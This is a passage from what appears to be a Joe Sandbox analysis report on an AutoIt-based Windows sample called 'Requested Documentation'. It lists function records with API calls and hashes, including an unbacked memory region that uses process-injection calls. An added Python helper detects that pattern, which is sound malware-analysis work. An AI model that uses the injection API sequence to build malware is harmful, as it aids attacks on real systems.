                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1559183368-0
                                                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                              • Instruction ID: d546934cc353bcf0b98597a77321d27220fca78b565254fd885d754c9b256029
                                                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                              • Instruction Fuzzy Hash: 3751C570F00B05DBCB249F69D8846AE77BAAF46331F258729F825962D1D774DD908BC0
                                                                              APIs
                                                                                • Part of subcall function 00984DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F
                                                                              • _free.LIBCMT ref: 009BE263
                                                                              • _free.LIBCMT ref: 009BE2AA
                                                                                • Part of subcall function 00986A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 2861923089-1757145024
                                                                              • Opcode ID: 0ebf266b22ceadd4423a2e1772fc6bdc9cd2b4278875413a6a03184ba0e3b636
                                                                              • Instruction ID: 244213f66877e0f2ac1aa8ab9dd568760dfcf36c01849f1cda8b2b0db483a78c
                                                                              • Opcode Fuzzy Hash: 0ebf266b22ceadd4423a2e1772fc6bdc9cd2b4278875413a6a03184ba0e3b636
                                                                              • Instruction Fuzzy Hash: DF917071904219AFCF14EFA4CC91AEDB7B8FF59320F10442AF815AB2A1DB74AD05CB50
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009835A1,SwapMouseButtons,00000004,?), ref: 009835D4
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 009835F5
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 00983617
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                                                                              • Instruction ID: 07ff0d10f017a8730f2d581b7c48ed035a49bc7e215d34e7fa71c65562b48e52
                                                                              • Opcode Fuzzy Hash: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                                                                              • Instruction Fuzzy Hash: 6D114571610208BFDB20DFA9DC81AAEBBBCEF04B40F008469E805E7310E2719E419BA0
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01301ACD
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01301AF1
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01301B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                              • Instruction ID: 55125a40c2436ca36269b5873b49211cf2ebfd5c9f40fdbce4a2da0ddc7d1fb6
                                                                              • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                              • Instruction Fuzzy Hash: A5621B30A14258DBEB25CFA4C850BDEB376EF58304F1091A9D20DEB2D4E7759E81CB59
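The function above is the one record on this page whose memory region is reported as "based on PE: false" and whose direct calls are CreateProcessW, Wow64GetThreadContext and ReadProcessMemory, the trio behind the "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" signatures in the report summary. The following triage helper is an added example, not Joe Sandbox code and not part of the sample: it parses the plain-text layout of the function records on this page (bullet API lines ending in `ref: ADDR`, then a `Source File ... based on PE: true|false` line) and flags functions that cover all three injector roles, raising severity when the code runs from memory not backed by a PE image. The regexes, the role grouping in `HOLLOW_ROLES`, and the severity labels are this example's own assumptions; the embedded sample records are constructed from two of the records on this page with their argument lists shortened.

```python
"""
Triage helper for Joe Sandbox 'Memory Dump Source' function records.

Added example (not Joe Sandbox code, not part of the analysed sample). It
parses the record layout shown on this page and flags functions whose direct
API calls cover process creation, thread-context access and remote memory
access, the combination an injector needs before it can overwrite a child.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two function records from this page, in the report's own
# layout, with argument lists shortened. The second one is the 01300000 region.
SAMPLE_REPORT = """\
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001), ref: 009835D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 009835F5
• RegCloseKey.KERNELBASE(00000000), ref: 00983617
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01301ACD
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01301AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01301B13
Memory Dump Source
• Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
"""

# Assumed line shapes, taken from the records on this page. 'Part of subcall
# function XXXX:' prefixes are accepted but the subcall address is not kept.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function \w+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)
SOURCE_LINE = re.compile(
    r"^\s*•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)

# Assumed role grouping. Wow64GetThreadContext returns the 32-bit register
# context of a WOW64 thread; GetThreadContext is the native equivalent.
HOLLOW_ROLES = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory"},
}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (api, module, args, ref)
    source: str = ""
    offset: str = ""
    backed_by_pe: bool | None = None


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into per-function records.

    The report lists a function's API calls first and its 'Memory Dump Source'
    after them, so a Source File line closes the record the preceding API
    lines belong to.
    """
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            current.apis.append(m.groups())
            continue
        m = SOURCE_LINE.match(line)
        if m:
            current.source, current.offset = m.group(1), m.group(2)
            current.backed_by_pe = m.group(3) == "true"
            records.append(current)
            current = FunctionRecord()
    return records


def hollowing_roles(rec: FunctionRecord) -> set[str]:
    """Return which injector roles this function's direct calls cover."""
    names = {api for api, _, _, _ in rec.apis}
    return {role for role, apis in HOLLOW_ROLES.items() if names & apis}


def flag_injectors(records: list[FunctionRecord]) -> list[dict]:
    """Flag functions covering all three roles; unbacked memory raises severity.

    'based on PE: false' means the dumped region is not backed by a PE image,
    which is how an unpacked second stage appears in the dump.
    """
    hits = []
    for rec in records:
        if hollowing_roles(rec) == set(HOLLOW_ROLES):
            unbacked = rec.backed_by_pe is False
            hits.append({
                "offset": rec.offset,
                "unbacked": unbacked,
                "apis": [api for api, _, _, _ in rec.apis],
                "severity": "high" if unbacked else "medium",
            })
    return hits


if __name__ == "__main__":
    for hit in flag_injectors(parse_records(SAMPLE_REPORT)):
        print(f"{hit['severity']:>6}  region {hit['offset']}  "
              f"unbacked={hit['unbacked']}  {' -> '.join(hit['apis'])}")
```

Run it against a full report export to list every function that carries the complete trio; on this sample only the 01300000 region qualifies, and because that region is not backed by a PE image the hit is rated high. The page does not show the CreateProcessW flags, so the helper deliberately does not check for a suspended-thread creation and relies on the API combination alone.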
                                                                              APIs
                                                                                • Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837
                                                                              • _free.LIBCMT ref: 009E96A2
                                                                              • _free.LIBCMT ref: 009E96A9
                                                                              • _free.LIBCMT ref: 009E9714
                                                                                • Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
                                                                                • Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B
                                                                              • _free.LIBCMT ref: 009E971C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                                                                              • Instruction ID: d198c7f6d40704a95c4bdc52b11a70cd6a2a3195aede0cfea8f7679ded30d905
                                                                              • Opcode Fuzzy Hash: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                                                                              • Instruction Fuzzy Hash: 90513DB1904259ABDF259F65CC81B9EBBB9EF88300F10449EB609A3351DB715E80CF58
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction ID: 564a8c1fa5f1b38cb3b79764eae786509aa8162c9c80a8a47023f1c055c6c061
                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction Fuzzy Hash: B241D475A007869BDB18CE69D8809AE77A9EFC3360B24853DE815C7680EBB4DD418BC0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009BEA39
                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 009BEA83
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
                                                                              • Instruction ID: 7b4e4cb2b5b09576de98fba4514cec4ef338fe8301571009feb4ce49e9b3e5e1
                                                                              • Opcode Fuzzy Hash: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
                                                                              • Instruction Fuzzy Hash: 69219671A002489BDB51EFD4D845BEEBBFDAF89714F104059F408AB341DBB859498F91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 1988441806-3962188686
                                                                              • Opcode ID: 9c8ef4ed826562a79839724aef8b5e6effccaf90ebce8c1522e5f983739d43a6
                                                                              • Instruction ID: 993d912281950b144420530071e60415ddaa10719fce6aeb575dd6802512c3d3
                                                                              • Opcode Fuzzy Hash: 9c8ef4ed826562a79839724aef8b5e6effccaf90ebce8c1522e5f983739d43a6
                                                                              • Instruction Fuzzy Hash: 2E01F971D042587EDB18CAA8CC16FEE7BFCDB11301F00459AF556D21C1E879A60487A0
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 009E98F8
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009E990F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
                                                                              • Instruction ID: 8b37d90921475dd3b5190a14b8c0f7e368cd93d3a6caf43443f6f34d365c64c8
                                                                              • Opcode Fuzzy Hash: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
                                                                              • Instruction Fuzzy Hash: A8D05B7554030D7FDB60DBD0DC0DFD6773CE704700F0006B1BA5491091D97055568B91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
                                                                              • Instruction ID: 81e3caa72b6ab3c5d660de588c6684caedadd04f51610bf6370ae9c65f462d28
                                                                              • Opcode Fuzzy Hash: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
                                                                              • Instruction Fuzzy Hash: 28F126B06083099FC714DF28C580A6ABBE5FF89314F54892EF9999B391D731E945CF82
                                                                              APIs
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1
                                                                                • Part of subcall function 009960F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0098F930), ref: 00996154
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098F9CD
                                                                              • OleInitialize.OLE32(00000000), ref: 0098FA4A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009C45C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 1986988660-0
                                                                              • Opcode ID: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
                                                                              • Instruction ID: c3bd0eb12a23e1d07213fc840efe57a30b4f26311a6345604b3fa6f1282cc04e
                                                                              • Opcode Fuzzy Hash: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
                                                                              • Instruction Fuzzy Hash: 6B81AABCD01A40CFC384EFB9A854659BBE6EBCA316764852A9019CF363E7725486CF11
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00984370
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00984432
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$_memset
                                                                              • String ID:
                                                                              • API String ID: 1505330794-0
                                                                              • Opcode ID: 7cd9a0c6ece75ab5ea62e3451a31f8837d528fa1d4c1ddbe2ccf46fc0bd2b6a2
                                                                              • Instruction ID: a204ee70c9f9989e27e23180e5f54396a6c555fdf77bf0e351502ce521ed0161
                                                                              • Opcode Fuzzy Hash: 7cd9a0c6ece75ab5ea62e3451a31f8837d528fa1d4c1ddbe2ccf46fc0bd2b6a2
                                                                              • Instruction Fuzzy Hash: EF318174904702CFD721EF74D88469BBBF8FF99308F00092EE59A82351E7B1A945CB52
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA192
                                                                                • Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA19C
                                                                              • __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009AA1C8: GetModuleFileNameW.KERNEL32(00000000,00A433BA,00000104,?,00000001,00000000), ref: 009AA25A
                                                                                • Part of subcall function 009AA1C8: ___crtMessageBoxW.LIBCMT ref: 009AA308
                                                                                • Part of subcall function 009A309F: ___crtCorExitProcess.LIBCMT ref: 009A30A5
                                                                                • Part of subcall function 009A309F: ExitProcess.KERNEL32 ref: 009A30AE
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
                                                                              • Instruction ID: 5af26579eeea164758a9ee70f2970881aefb028733854e21691ad8ce143abb8c
                                                                              • Opcode Fuzzy Hash: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
                                                                              • Instruction Fuzzy Hash: 9101F57A304B01EFDA516774EC82B2E735C8BC3361F620525F505BA182EFB58C4186E0
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009E9548,?,?,?,?,?,00000004), ref: 009E98BB
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009E98D1
                                                                              • CloseHandle.KERNEL32(00000000,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E98D8
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                                                                              • Instruction ID: fd1cb9c3471656cb322567b3a84deea76f9ecbf4c75e88458caf2d75b4bdf81d
                                                                              • Opcode Fuzzy Hash: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                                                                              • Instruction Fuzzy Hash: 0AE0863214121CBFD7315B94EC09FCA7B19AB06B70F104220FB24794E087B1192397D8
                                                                              APIs
                                                                              • _free.LIBCMT ref: 009E8D1B
                                                                                • Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
                                                                                • Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B
                                                                              • _free.LIBCMT ref: 009E8D2C
                                                                              • _free.LIBCMT ref: 009E8D3E
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                                                                              • Instruction ID: 52387bd832643331ff33c563e9869301e8a5c1988d0ae2f24362c13e4a0e6009
                                                                              • Opcode Fuzzy Hash: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                                                                              • Instruction Fuzzy Hash: 7EE017A160164146CB26A6BEAD40B9323EC4F9D352B140D1EB40DD71C7CE64FC8281A8
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CALL
                                                                              • API String ID: 0-4196123274
                                                                              • Opcode ID: a95030bb6fcc2e6a2b580c1079786b1fffb0bebb55f3305fae34290191780dd8
                                                                              • Instruction ID: 801193b4f17c933c63d4244416caf6fca2fe553fb595f0b7b04ec77de16d969d
                                                                              • Opcode Fuzzy Hash: a95030bb6fcc2e6a2b580c1079786b1fffb0bebb55f3305fae34290191780dd8
                                                                              • Instruction Fuzzy Hash: 87225974508301DFDB24EF14C494B6ABBE5BF85314F18896EE89A8B362D735EC45CB82
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 4104443479-3962188686
                                                                              • Opcode ID: 86be7b36f5f2bfd0c85778efdfc554b48f4bd6339d121339dabefdde5d06ad1f
                                                                              • Instruction ID: 65158c892d53d4daa0c2be65a13e17e5a368b0152c9934031515a7ed844bba1b
                                                                              • Opcode Fuzzy Hash: 86be7b36f5f2bfd0c85778efdfc554b48f4bd6339d121339dabefdde5d06ad1f
                                                                              • Instruction Fuzzy Hash: 8B415F31A0425A5BDF21BB64CC517BE7FA59F85300F684475EC86DB3C6D624BD4483A1
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 00984834
                                                                                • Part of subcall function 009A336C: __lock.LIBCMT ref: 009A3372
                                                                                • Part of subcall function 009A336C: DecodePointer.KERNEL32(00000001,?,00984849,009D7C74), ref: 009A337E
                                                                                • Part of subcall function 009A336C: EncodePointer.KERNEL32(?,?,00984849,009D7C74), ref: 009A3389
                                                                                • Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00984915
                                                                                • Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0098492A
                                                                                • Part of subcall function 00983B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
                                                                                • Part of subcall function 00983B3A: IsDebuggerPresent.KERNEL32 ref: 00983B7A
                                                                                • Part of subcall function 00983B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB
                                                                                • Part of subcall function 00983B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00984874
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 1438897964-0
                                                                              • Opcode ID: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
                                                                              • Instruction ID: 1744cdf5d97280bc3a09b7af2bd156c5c74aa62ccd69911706cb06ab58577fa0
